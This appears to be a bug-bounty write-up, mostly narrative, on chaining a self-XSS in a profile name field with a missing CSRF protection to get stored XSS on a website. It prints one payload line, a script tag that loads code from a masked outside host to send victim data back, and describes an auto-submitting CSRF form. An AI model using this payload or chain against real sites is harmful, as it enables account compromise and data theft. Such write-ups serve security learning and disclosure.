Self-XSS + CSRF to Stored XSS

Hola, this is Renwa from Kurdistan i’m glad to write my first write-up about infosec and Bugbounties.

so i was digging in the website and finally i found an xss when a user wants to change his name added a simple payload and refreshed the page, bingo!

user settings panel
XSS proof

so the problem is the profile is not public and the only way to get the XSS is to tell the victim to change his name to malicious javascript code and that will be called Self-XSS there is no impact with it.

i started burpsuite and changed my name the request looks like:

hmm that looks interesting, i generated burpsuite CSRF poc

replayed in browser response was:

Awesome! now we have CSRF + Self-XSS let’s chain that together the form now looks like:

Final POC

as you can see in the last name field i have added the javascript code it’s from that generate XSS poc you should give a try.

“><script src=https://***></script>

and in the last i have added javascript submit form on load the file to make it more effective.

now the user name is changed to the javascript code after he navigate the homepage the code will be in his browser and send back all info’s we need since there wasn’t any CSP protection.

Stored XSS

and going back to XSSHunter we can confirm it became Stored XSS, when any user opens our HTML form.

After all thanks for reading if i helped clap hands to more write-ups about infosec, remember where there is self-XSS always look for CSRF to chain it together and make it a stored, by self-XSS i don’t mean user entered codes into browser console or self-dom XSS .